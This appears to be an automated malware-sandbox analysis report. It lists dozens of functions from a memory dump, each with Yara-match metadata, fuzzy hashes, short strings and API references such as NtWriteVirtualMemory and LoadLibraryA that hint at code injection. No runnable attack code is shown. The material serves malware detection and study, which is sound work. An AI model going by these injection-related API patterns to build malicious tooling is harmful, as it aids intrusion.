Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: UY$Xkiu$dGi
API String ID: 2616484454-2109732242
Opcode ID: 59ba68d3f35af631417b562f270300b95a3920adb660f0275198efa57bebaeff
Instruction ID: a6d6c20e9c67d0db9632a8dac6a018403f508022938273ecfa56d2ffbc0c5878
Opcode Fuzzy Hash: 59ba68d3f35af631417b562f270300b95a3920adb660f0275198efa57bebaeff
Instruction Fuzzy Hash: 4172627260434A9FDB768E24CD907EE77B2FF95390F95812EDC899B250D3318A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B60FA, Relevance: 9.6, APIs: 1, Strings: 4, Instructions: 848COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
u, xrefs: 020B623A
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: UY$Xkiu$dGi$u
API String ID: 2616484454-3980033471
Opcode ID: 19206b77c711ae09fa35df6da1effd81f6ab10ea41bf38ac4e3e53968cc078ea
Instruction ID: 4c95c692ea5518bd10095f50a2edc5a9fe3ed2e493797851dcc469ae2b0ec4a1
Opcode Fuzzy Hash: 19206b77c711ae09fa35df6da1effd81f6ab10ea41bf38ac4e3e53968cc078ea
Instruction Fuzzy Hash: 1162537260434A9FDB768E24CD907EEB7B2FF95350F55812EDC899B214D3318A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B3E30, Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 815COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UY$Xkiu$dGi
API String ID: 0-2109732242
Opcode ID: ededf9df30c3a1f0f186e4e8761b987e311b55926b68bb0a179f80bf46d9913f
Instruction ID: be9bce52e1cc302b8748ffe557e459f1334d89d721f927ec5ffe2bda44dd83bc
Opcode Fuzzy Hash: ededf9df30c3a1f0f186e4e8761b987e311b55926b68bb0a179f80bf46d9913f
Instruction Fuzzy Hash: BA62517260434A9FDB758E24CD907EEBBB2FF95350F55822EDC8A9B250D3314A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B7E78, Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 783COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UY$Xkiu$dGi
API String ID: 0-2109732242
Opcode ID: e10705dd0726cb64ab14eb095904d586469481b47af087468eee95e5284ac1e0
Instruction ID: 3d5757708174922322382b34515bbce3a946ae685030ec9b9369a68148619ade
Opcode Fuzzy Hash: e10705dd0726cb64ab14eb095904d586469481b47af087468eee95e5284ac1e0
Instruction Fuzzy Hash: A152637260434A9FDB758E24CD907EEBBB2FF95350F55812EDC899B210D3358A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B1ED7, Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 770COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UY$Xkiu$dGi
API String ID: 0-2109732242
Opcode ID: a1dd1cd498bc6ffc1c4fece04f7005ef4bcf7121018f43539d3d789f7e0cfff7
Instruction ID: bf9c1d362f8dee506ad8dcec54d2eeb74bf216abd81306e6ac973a7b8c75cc94
Opcode Fuzzy Hash: a1dd1cd498bc6ffc1c4fece04f7005ef4bcf7121018f43539d3d789f7e0cfff7
Instruction Fuzzy Hash: DC52417260434A9FDB768E24CD907EEBBB2FF95350F95812EDD899B210D3314A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B8BBE, Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 768COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UY$Xkiu$dGi
API String ID: 0-2109732242
Opcode ID: 319be9d73c10efa791ed713b5f520efba5ecba984a02a80ed58a8e514b5a1444
Instruction ID: 638ae423433d54ea28c4e1f77b462e66e45d75b83b6f1b1eb60098615c3571f8
Opcode Fuzzy Hash: 319be9d73c10efa791ed713b5f520efba5ecba984a02a80ed58a8e514b5a1444
Instruction Fuzzy Hash: D552627260434A9FDB768E24CD907EEBBB2FF55350F55822EDC899B210D3354A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B44CF, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 748nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: 90d52e6087c260db98a0fb7c5247c818af59252470349bf474194a35bbd8a1c2
Instruction ID: a36ab43d7437efd3ae78b5b51f3f890f0622528329c5304082976e4797adf1f6
Opcode Fuzzy Hash: 90d52e6087c260db98a0fb7c5247c818af59252470349bf474194a35bbd8a1c2
Instruction Fuzzy Hash: B852517260434A9FDB758E24CD907EEBBB2FF95390F55822EDD899B210D3714A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B4520, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 735nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: 41f97a3bac23f36aeea86290e4d83b40632cb6c585de10bf0e29e6eb63406dbf
Instruction ID: 995bdf3b0a964cecb9018ed4e0ae7690fc4af975559252357939d7748abd4695
Opcode Fuzzy Hash: 41f97a3bac23f36aeea86290e4d83b40632cb6c585de10bf0e29e6eb63406dbf
Instruction Fuzzy Hash: 8552417260434A9FDB758E24CD907EEBBB2FF95350F55812EDD899B210D3318A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B45B5, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 723COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UY$Xkiu$dGi
API String ID: 0-2109732242
Opcode ID: 9c63899fb668da37d68b31e41969d4c215ac15a3ef1df5a4aad158f48cd2a834
Instruction ID: c8dad8165e1af14180170249ac6e7191455b6ca6116e9d8c635f4f0a43c937df
Opcode Fuzzy Hash: 9c63899fb668da37d68b31e41969d4c215ac15a3ef1df5a4aad158f48cd2a834
Instruction Fuzzy Hash: D652427260434A9FDB758E24CD907EEBBB2FF95350F55822EDC899B210D3358A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B4570, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 721nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: 26b545a45dd74bf45941555f615a7700e80f9611523d37a9be8737c3e23d8256
Instruction ID: ca2d81638edf6805251b23a5587be54cdb6195af5e4696337936ed94e77c9135
Opcode Fuzzy Hash: 26b545a45dd74bf45941555f615a7700e80f9611523d37a9be8737c3e23d8256
Instruction Fuzzy Hash: B952517260434A9FDB758E24CD907EEBBB2FF95350F55822EDC899B210D3318A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B45E4, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 707COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UY$Xkiu$dGi
API String ID: 0-2109732242
Opcode ID: 6a6358fb6f0fa479254560698652b90fb5b2748b2b3dbc7db5dbd10332b71a76
Instruction ID: be1fe4e85259048d455808ef9b0a345610971f54967c75a388201ff38a4aa8ce
Opcode Fuzzy Hash: 6a6358fb6f0fa479254560698652b90fb5b2748b2b3dbc7db5dbd10332b71a76
Instruction Fuzzy Hash: D042427260434A9FDB768E24CD907EEBBB2FF95350F55812EDC899B210D3358A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B45E0, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 704nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: acef843d9bd778222fc63cc12fe780841ffff85dc50133a97f5447a361d307b3
Instruction ID: eec5435d9c457f0cc791ba2b2834582aa1ed008ede0f43604e3864bd83673b73
Opcode Fuzzy Hash: acef843d9bd778222fc63cc12fe780841ffff85dc50133a97f5447a361d307b3
Instruction Fuzzy Hash: 4E42527260434A9FDB758E24CD907EEBBB2FF95350F55822EDC899B210D3358A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B45F9, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 701nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: 444d3668e3426353bc050d2d013b9d3c7973b9db074a312972a6556f2c38e993
Instruction ID: c87a94f33ba3788a46587230073de2158d1b72c7e53c692f653c6770871222fb
Opcode Fuzzy Hash: 444d3668e3426353bc050d2d013b9d3c7973b9db074a312972a6556f2c38e993
Instruction Fuzzy Hash: 5D42527260434A9FDB758E24CD907EEBBB2FF95350F55822EDC899B210D3758A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B4638, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 691nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: e2d41190748602d0927b7aad7819435508b84fbf5e660171beebdb7d06dabcbd
Instruction ID: a373ba9a431dd67335fd9ab98389e4105be273574b3688d7feb9089d7b2a1347
Opcode Fuzzy Hash: e2d41190748602d0927b7aad7819435508b84fbf5e660171beebdb7d06dabcbd
Instruction Fuzzy Hash: EE42427260434A9FDB758E24CD907EEBBB2FF95350F55822EDC899B210D3758A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B4694, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 676nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: e1973253e00fa871e369db97ccd710bf7cc1ef83538a22d565636430949d19cb
Instruction ID: d7dd50f01c980d225fe34dfb95ad20944498e6840a5ac4dbae2f17136819794f
Opcode Fuzzy Hash: e1973253e00fa871e369db97ccd710bf7cc1ef83538a22d565636430949d19cb
Instruction Fuzzy Hash: 1642427260434A9FDB768E24CD507EEBBB2FF95350F55822EDC899B210D3358A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B46D3, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 669nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: 74d79253f7726444db79349c88b22701dbfc574b5dbfe6970bc57d1732a40123
Instruction ID: 9dcff325f6b8346f945be1481eb52307f972c82302d9593b8020248aa2681e91
Opcode Fuzzy Hash: 74d79253f7726444db79349c88b22701dbfc574b5dbfe6970bc57d1732a40123
Instruction Fuzzy Hash: 0C42537260434A9FDB368E24CD907EE7BB2FF95350F55812DDC899B210D3358A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B4797, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 633nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: 265512e7f13071ec06ef484d26f7ad1082d9fda17f027bd538e64413b98fe96d
Instruction ID: c6ef4539d37a3b59dd617a5b6bc875f8cf03f424568cc0cb6a6e0d2a290f57b3
Opcode Fuzzy Hash: 265512e7f13071ec06ef484d26f7ad1082d9fda17f027bd538e64413b98fe96d
Instruction Fuzzy Hash: 6632327260434A9FEB768E24CD907EE7BB2FF56350F55822DDC899B210D3718A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B47F4, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 613nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: 449820e85522bceba7075264d05d7cd2426dd3605af7bf77a11735594e7035f0
Instruction ID: 2a8e498f2073efc477ebc0a36c9d93026892374dba9671fa9b93cc57f60da38e
Opcode Fuzzy Hash: 449820e85522bceba7075264d05d7cd2426dd3605af7bf77a11735594e7035f0
Instruction Fuzzy Hash: 7032417260434A9FEB368F24CD907EE7BB2FF95350F558229DC899B210D3718A81DB41

Uniqueness

Uniqueness Score: -1.00%

Function 020B4847, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 595nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: 86b1b939ddc0eae6719ffdd785251fa9de8258354e700a422be1434429f72e76
Instruction ID: d632331b30401987a5a9b6ca2750c749ed6934903946402df70aaecbd96ff19e
Opcode Fuzzy Hash: 86b1b939ddc0eae6719ffdd785251fa9de8258354e700a422be1434429f72e76
Instruction Fuzzy Hash: D332427260434A9FEB368F24CD907EEBBB2FF56350F558229DC899B214D3718A81DB41

Uniqueness

Uniqueness Score: -1.00%

Function 020B4899, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 580nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: 04a0278bcfe036688ac44a3ad7c381925f433edc0a457156cb8f6a54e1c5c33e
Instruction ID: 476e4ff2d24b0059d8c698756c8bcf0429589be472044db961de5e4d1f16786d
Opcode Fuzzy Hash: 04a0278bcfe036688ac44a3ad7c381925f433edc0a457156cb8f6a54e1c5c33e
Instruction Fuzzy Hash: 7322537260434A9FEB368F24CD907EE7BB2FF56350F558229DC899B210D3758A81DB41

Uniqueness

Uniqueness Score: -1.00%

Function 020B48E3, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 565librarynativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4
LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: ed20a5adec12e997554339ef400978ec6ab7f59678729bad2ce6b9acd78d32a2
Instruction ID: c127e78b85ce3da0b93282db26ac6eb1a3fef1a62e36e366e8501b80273e8903
Opcode Fuzzy Hash: ed20a5adec12e997554339ef400978ec6ab7f59678729bad2ce6b9acd78d32a2
Instruction Fuzzy Hash: 4822437260434A9FEB368F24CD907EE7BB2FF56350F558229DC899B210D3758A81DB81

Uniqueness

Uniqueness Score: -1.00%

Function 020B4948, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 545librarynativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4
LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: 77bc20b91b4dd9a25ae629f0128fe0e46e4f429ee543d025ec4775c6579ac7b0
Instruction ID: 44aec8011461662c9bd0c42c9dcca4c4c9ac249df58adcbdd88d41e8ee0b39f2
Opcode Fuzzy Hash: 77bc20b91b4dd9a25ae629f0128fe0e46e4f429ee543d025ec4775c6579ac7b0
Instruction Fuzzy Hash: A422327260434A9FEB768E24CD907EE7BB2FF56350F558229DC899B210D3758A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 020B4985, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 530nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3527976591-2109732242
Opcode ID: 130dcbe7a4676fc9535739ab275570fa4eebfbd93216c27406f1a37c8ca478f3
Instruction ID: 7462ba5c6b9184c133d97eba970bb08413f0539dc3b2d8426d9f2b8b070fe936
Opcode Fuzzy Hash: 130dcbe7a4676fc9535739ab275570fa4eebfbd93216c27406f1a37c8ca478f3
Instruction Fuzzy Hash: E112437260434A9FEB758F24CD907EE7BB2FF56390F518229DC899B250D3358A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 020B49F4, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 509nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3527976591-2109732242
Opcode ID: a58c90bac6ff8e2a49fa0a42890b4cd3ae74753b682ecfe5f7616d90dd60cc56
Instruction ID: cc922f69416c1de5c27714dd164ec2c9c47e3c66fbed5374a699a35b44017251
Opcode Fuzzy Hash: a58c90bac6ff8e2a49fa0a42890b4cd3ae74753b682ecfe5f7616d90dd60cc56
Instruction Fuzzy Hash: DF12547260434A9FEB758F24CD907EE7BB2FF56350F518229DC899B210D3758A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 020B4A27, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 500nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3527976591-2109732242
Opcode ID: 1f662f8ca0a3e88dbf30944986933d94088f1a16510f23aa427eaf97f260054d
Instruction ID: e333a094dec4ea547d8dd319d230266541eb5127fe116bf4084738a26b4d0937
Opcode Fuzzy Hash: 1f662f8ca0a3e88dbf30944986933d94088f1a16510f23aa427eaf97f260054d
Instruction Fuzzy Hash: 9512437260434A9FEB758F24CD907EE7BB2FF56390F518229DC899B250D3758A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 020B4A73, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 499COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UY$Xkiu$dGi
API String ID: 0-2109732242
Opcode ID: 30ec566fefa13178768eb96fd87e35fc89594c7d5559dd5c41f1f12ece172958
Instruction ID: 6652a6ee882f78e372890dc44a780c8a57649b17a5d8a2c65c30dfcce7f301e0
Opcode Fuzzy Hash: 30ec566fefa13178768eb96fd87e35fc89594c7d5559dd5c41f1f12ece172958
Instruction Fuzzy Hash: 020264726043499FEB768E24CD907EE7BB2FF56390F51822DDC899B250D3758A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 020B4A87, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 495COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UY$Xkiu$dGi
API String ID: 0-2109732242
Opcode ID: 6e8c021f7dcef96f97e3442321b7a6c7fbcdde983ae93ce246344ed024524a9c
Instruction ID: e9423a85e4199adbbda8c5d786624d37b5f71de34e12dad2934d74892692466d
Opcode Fuzzy Hash: 6e8c021f7dcef96f97e3442321b7a6c7fbcdde983ae93ce246344ed024524a9c
Instruction Fuzzy Hash: 970253726043499FEB758E24CD907EE7BB2FF56390F51822DDC899B250D3758A81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 020B4AA0, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 485nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3527976591-2109732242
Opcode ID: 6b50978248277d45638c717505387fc37d59df7b7387a325eedb7c01729512c7
Instruction ID: 146ea17b6ea6370735e275d3bff9b6634583597444bf4cfbcbc38004e5ae8817
Opcode Fuzzy Hash: 6b50978248277d45638c717505387fc37d59df7b7387a325eedb7c01729512c7
Instruction Fuzzy Hash: 840262726043499FEB758E24CD907EE7BB2FF56390F51822DDC899B250D3758A81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 020B4B00, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 465nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C
